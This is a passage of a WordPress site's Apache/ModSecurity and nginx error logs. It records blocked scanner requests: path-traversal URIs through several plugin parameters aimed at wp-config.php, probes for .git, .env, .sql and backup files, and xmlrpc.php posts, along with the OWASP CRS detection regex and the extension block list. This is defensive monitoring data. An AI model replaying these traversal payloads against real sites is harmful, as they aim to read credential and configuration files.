"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y1mH4ZwyjGV4QKlEDRSllAAAAM8"], referer: https://www.google.com [Wed Oct 26 14:18:11.976395 2022] [:error] [pid 2735:tid 140358574270208] [client 159.69.21.14:43546] [client 159.69.21.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y1mH817v0bMvuVQUuS4pkwAAAIE"], referer: https://www.google.com [Wed Oct 26 14:18:38.958455 2022] [:error] [pid 2733:tid 140358432311040] [client 159.69.21.14:43554] [client 159.69.21.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y1mIDgkK-VOud3993CtcvQAAAAk"], referer: https://www.google.com [Wed Oct 26 14:18:49.256494 2022] [:error] [pid 2735:tid 140358415525632] [client 159.69.21.14:43558] [client 159.69.21.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y1mIGV7v0bMvuVQUuS4plAAAAIs"], referer: https://www.google.com 2022/10/27 01:57:48 [error] 20248#20248: *16276 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/27 01:57:49 [error] 20249#20249: *16277 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/27 01:57:49 [error] 20248#20248: *16278 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/27 01:57:49 [error] 20248#20248: *16279 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/27 01:57:49 [error] 20248#20248: *16280 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/27 01:57:50 [error] 20248#20248: *16281 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/27 01:57:50 [error] 20249#20249: *16282 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/27 01:57:50 [error] 20248#20248: *16283 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Oct 27 01:59:28.415931 2022] [:error] [pid 23297:tid 140352761595648] [client 45.55.197.84:37238] [client 45.55.197.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "Y1osUFhYrVeB4DqsAtfD3wAAAA4"] [Thu Oct 27 15:35:48.506738 2022] [autoindex:error] [pid 32391:tid 140201951225600] [client 20.214.144.69:55648] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Oct 27 18:20:00.578563 2022] [:error] [pid 32391:tid 140201959618304] [client 18.228.153.187:35628] [client 18.228.153.187] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y1sSIHvFRuv7aDtejtje6AAAAMA"] [Thu Oct 27 18:20:46.909126 2022] [:error] [pid 31770:tid 140201850513152] [client 18.228.153.187:35756] [client 18.228.153.187] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y1sSTg67jF3jskqMsyPPDQAAAE0"] [Thu Oct 27 19:34:46.575908 2022] [:error] [pid 31770:tid 140201800156928] [client 5.188.62.76:40374] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y1sjpg67jF3jskqMsyPP4AAAAFM"] [Fri Oct 28 11:38:33.488461 2022] [autoindex:error] [pid 15750:tid 140050142582528] [client 57.128.19.189:36396] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Oct 29 00:24:57.490394 2022] [autoindex:error] [pid 15750:tid 140050265773824] [client 13.72.108.107:56686] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2022/10/29 02:43:36 [error] 14979#14979: *55643 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/29 02:43:36 [error] 14979#14979: *55644 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/29 02:43:36 [error] 14979#14979: *55645 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/29 02:43:37 [error] 14979#14979: *55646 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/29 02:43:37 [error] 14979#14979: *55647 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/29 02:43:37 [error] 14979#14979: *55648 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/29 02:43:37 [error] 14979#14979: *55649 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2022/10/29 02:43:38 [error] 14980#14980: *55650 access forbidden by rule, client: 54.75.30.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Oct 29 16:59:37.957200 2022] [autoindex:error] [pid 26217:tid 139874594187008] [client 57.128.19.189:54386] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2022/10/30 16:34:06 [error] 20533#20533: *110562 access forbidden by rule, client: 79.120.76.144, server: investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "investigacionperu.com" [Sun Oct 30 17:14:08.591870 2022] [:error] [pid 21608:tid 140554024736512] [client 69.163.163.206:60434] [client 69.163.163.206] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y173MMNJG-fcABvqm_1ZkQAAAMI"] [Mon Oct 31 13:27:54.950686 2022] [:error] [pid 27800:tid 140461654136576] [client 5.188.62.174:35378] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2ATquRWhWcKdjO14JOJhgAAAEM"] [Tue Nov 01 05:47:38.772059 2022] [:error] [pid 6006:tid 140216429954816] [client 5.188.62.174:56716] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2D5SifAxfjy8-iYvp0JawAAAMM"] [Tue Nov 01 05:52:47.831037 2022] [:error] [pid 5682:tid 140216312456960] [client 5.188.62.76:56836] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2D6f4qYKcA8AJ4XVEZkcgAAAJE"] [Tue Nov 01 12:47:34.229364 2022] [:error] [pid 5680:tid 140216270493440] [client 5.188.62.140:38798] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2FbtgkE_uag3zU0ZyHRLQAAABY"] [Tue Nov 01 14:39:42.210962 2022] [:error] [pid 6006:tid 140216429954816] [client 5.188.62.174:40910] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2F1_ifAxfjy8-iYvp0PngAAAMM"] [Tue Nov 01 15:39:35.718663 2022] [:error] [pid 5682:tid 140216320849664] [client 5.188.62.76:42166] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2GEB4qYKcA8AJ4XVEZoZgAAAJA"] [Tue Nov 01 16:44:33.021618 2022] [:error] [pid 5681:tid 140216446740224] [client 5.188.62.21:43416] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2GTQY4MY2MdpC1VRZuUhAAAAEE"] [Tue Nov 01 19:41:05.331540 2022] [:error] [pid 6006:tid 140216371205888] [client 173.252.95.4:47498] [client 173.252.95.4] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y2G8oSfAxfjy8-iYvp0TAwAAAMo"] [Tue Nov 01 23:38:14.830618 2022] [:error] [pid 6006:tid 140216346027776] [client 5.188.62.174:52668] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2H0NifAxfjy8-iYvp0VbAAAAM0"] [Wed Nov 02 00:24:48.265000 2022] [:error] [pid 5681:tid 140216413169408] [client 5.188.62.76:53828] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2H_II4MY2MdpC1VRZuWzAAAAEU"] [Wed Nov 02 01:29:39.880453 2022] [:error] [pid 5682:tid 140216312456960] [client 51.89.199.101:56822] [client 51.89.199.101] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/backup.sql"] [unique_id "Y2IOU4qYKcA8AJ4XVEZtGwAAAJE"] [Wed Nov 02 03:03:49.266673 2022] [autoindex:error] [pid 5680:tid 140216329242368] [client 172.174.9.14:58428] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Nov 02 08:25:18.176942 2022] [:error] [pid 2524:tid 140432310744832] [client 5.188.62.76:39210] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2Jvvm2gelIdL5KEQcmYNwAAAMw"] [Wed Nov 02 08:45:58.244275 2022] [:error] [pid 1878:tid 140432260388608] [client 5.188.62.174:39668] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2J0lgQ76hxdnQ2ZaaVVBQAAABI"] [Wed Nov 02 12:51:36.597756 2022] [:error] [pid 2524:tid 140432302352128] [client 5.188.62.21:52020] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y2KuKG2gelIdL5KEQcme1wAAAM0"] [Wed Nov 02 19:47:17.783877 2022] [:error] [pid 26922:tid 140434693093120] [client 5.188.62.76:44046] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file 